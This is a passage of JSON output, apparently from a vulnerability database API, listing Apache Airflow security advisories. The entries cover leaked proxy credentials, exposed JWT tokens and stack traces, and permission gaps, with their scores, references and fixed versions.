"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-15T19:53:19Z/" } ], "url": "https://lists.apache.org/thread/t4dlmqkn0njz4chk3g7mdgzb96y4ttqh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/91427?format=api", "purl": "pkg:pypi/apache-airflow@3.1.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-6vv8-kr7f-mubf" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.8" } ], "aliases": [ "CVE-2026-25219", "GHSA-4g48-54q2-fg7q" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nz83-fzzb-5ucs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93134?format=api", "vulnerability_id": "VCID-r2bq-ukcr-1fa3", "summary": "In Apache Airflow versions before 3.1.6, and 2.11.1 the proxies and proxy fields within a Connection may include proxy URLs containing embedded authentication information. These fields were not treated as sensitive by default and therefore were not automatically masked in log output. As a result, when such connections are rendered or printed to logs, proxy credentials embedded in these fields could be exposed.\n\nUsers are recommended to upgrade to 3.1.6 or later for Airflow 3, and 2.11.1 or later for Airflow 2 which fixes this issue", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68675", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14239", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14122", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68675" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-10.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-10.yaml" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/01/15/6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/01/15/6" }, { "reference_url": "https://github.com/apache/airflow/pull/59688", "reference_id": "59688", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T16:05:54Z/" } ], "url": "https://github.com/apache/airflow/pull/59688" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68675", "reference_id": "CVE-2025-68675", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68675" }, { "reference_url": "https://github.com/advisories/GHSA-7c2f-r6gc-h92h", "reference_id": "GHSA-7c2f-r6gc-h92h", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7c2f-r6gc-h92h" }, { "reference_url": "https://lists.apache.org/thread/x6kply4nqd4vc4wgxtm6g9r2tt63s8c5", "reference_id": "x6kply4nqd4vc4wgxtm6g9r2tt63s8c5", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T16:05:54Z/" } ], "url": "https://lists.apache.org/thread/x6kply4nqd4vc4wgxtm6g9r2tt63s8c5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/37837?format=api", "purl": "pkg:pypi/apache-airflow@3.1.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-gbn8-8y8d-gkgw" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-srr5-3rxv-rkg8" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.6" } ], "aliases": [ "BIT-airflow-2025-68675", "CVE-2025-68675", "GHSA-7c2f-r6gc-h92h", "PYSEC-2026-10" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r2bq-ukcr-1fa3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/83461?format=api", "vulnerability_id": "VCID-srr5-3rxv-rkg8", "summary": "Apache Airflow versions 3.1.0 through 3.1.6 contain an authorization flaw that can allow an authenticated user with custom permissions limited to task access to view task logs without having task log access. \n\nUsers are recommended to upgrade to Apache Airflow 3.1.7 or later, which resolves this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-22922", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.15123", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.15001", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-22922" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-11.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-11.yaml" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/02/09/2", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/02/09/2" }, { "reference_url": "https://github.com/apache/airflow/pull/60412", "reference_id": "60412", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-09T16:31:30Z/" } ], "url": "https://github.com/apache/airflow/pull/60412" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22922", "reference_id": "CVE-2026-22922", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22922" }, { "reference_url": "https://lists.apache.org/thread/gdb7vffhpmrj5hp1j0oj1j13o4vmsq40", "reference_id": "gdb7vffhpmrj5hp1j0oj1j13o4vmsq40", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-09T16:31:30Z/" } ], "url": "https://lists.apache.org/thread/gdb7vffhpmrj5hp1j0oj1j13o4vmsq40" }, { "reference_url": "https://github.com/advisories/GHSA-pm44-x5x7-24c4", "reference_id": "GHSA-pm44-x5x7-24c4", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pm44-x5x7-24c4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38937?format=api", "purl": "pkg:pypi/apache-airflow@3.1.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.7" } ], "aliases": [ "BIT-airflow-2026-22922", "CVE-2026-22922", "GHSA-pm44-x5x7-24c4", "PYSEC-2026-11" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-srr5-3rxv-rkg8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71318?format=api", "vulnerability_id": "VCID-szqt-j7av-dqde", "summary": "JWT Tokens used by tasks were exposed in logs. This could allow UI users to act as Dag Authors. \nUsers are advised to upgrade to Airflow version that contains fix.\n\nUsers are recommended to upgrade to version 3.2.0, which fixes this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31987", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12493", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12585", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31987" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31987", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31987" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/16/7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/16/7" }, { "reference_url": "https://github.com/apache/airflow/issues/62428", "reference_id": "62428", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-18T02:27:54Z/" } ], "url": "https://github.com/apache/airflow/issues/62428" }, { "reference_url": "https://github.com/apache/airflow/issues/62773", "reference_id": "62773", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-18T02:27:54Z/" } ], "url": "https://github.com/apache/airflow/issues/62773" }, { "reference_url": "https://github.com/apache/airflow/pull/62964", "reference_id": "62964", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-18T02:27:54Z/" } ], "url": "https://github.com/apache/airflow/pull/62964" }, { "reference_url": "https://github.com/advisories/GHSA-phv5-vq5p-qhp7", "reference_id": "GHSA-phv5-vq5p-qhp7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-phv5-vq5p-qhp7" }, { "reference_url": "https://lists.apache.org/thread/pvsrtxzwo9xy6xgknmwslv4zrw70kt6g", "reference_id": "pvsrtxzwo9xy6xgknmwslv4zrw70kt6g", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-18T02:27:54Z/" } ], "url": "https://lists.apache.org/thread/pvsrtxzwo9xy6xgknmwslv4zrw70kt6g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/92193?format=api", "purl": "pkg:pypi/apache-airflow@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.0" } ], "aliases": [ "CVE-2026-31987", "GHSA-phv5-vq5p-qhp7" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-szqt-j7av-dqde" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/84240?format=api", "vulnerability_id": "VCID-tbn8-rdjn-nban", "summary": "The asset dependency graph did not restrict nodes by the viewer's DAG read permissions: a user with read access to at least one DAG could browse the asset graph for any other asset in the deployment and learn the existence and names of DAGs and assets outside their authorized scope.\n\nUsers are recommended to upgrade to version 3.2.1, which fixes this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40690", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.25108", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24909", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40690" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/apache/airflow/commit/cf3452d76e2ef5a8bae247f9fc90c759ff9df02f", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow/commit/cf3452d76e2ef5a8bae247f9fc90c759ff9df02f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40690", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40690" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/24/4", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/24/4" }, { "reference_url": "https://github.com/apache/airflow/pull/65273", "reference_id": "65273", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:54:08Z/" } ], "url": "https://github.com/apache/airflow/pull/65273" }, { "reference_url": "https://lists.apache.org/thread/bqt7y4g2cpj396b0sd20lv510ff19ndl", "reference_id": "bqt7y4g2cpj396b0sd20lv510ff19ndl", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:54:08Z/" } ], "url": "https://lists.apache.org/thread/bqt7y4g2cpj396b0sd20lv510ff19ndl" }, { "reference_url": "https://github.com/advisories/GHSA-w7rc-q6cm-f5gm", "reference_id": "GHSA-w7rc-q6cm-f5gm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w7rc-q6cm-f5gm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93941?format=api", "purl": "pkg:pypi/apache-airflow@3.2.1rc1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.1rc1" } ], "aliases": [ "CVE-2026-40690", "GHSA-w7rc-q6cm-f5gm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tbn8-rdjn-nban" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66519?format=api", "vulnerability_id": "VCID-ttb5-juj4-uugt", "summary": "In case of SQL errors, exception/stack trace of errors was exposed in API even if \"api/expose_stack_traces\" was set to false. That could lead to exposing additional information to potential attacker. Users are recommended to upgrade to Apache Airflow 3.2.0, which fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30912", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0007", "scoring_system": "epss", "scoring_elements": "0.21799", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.0007", "scoring_system": "epss", "scoring_elements": "0.21612", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30912" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-18.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-18.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30912", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30912" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/17/5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/17/5" }, { "reference_url": "https://github.com/apache/airflow/pull/63028", "reference_id": "63028", "reference_type": "", "scores": [ { "value": "5.3", 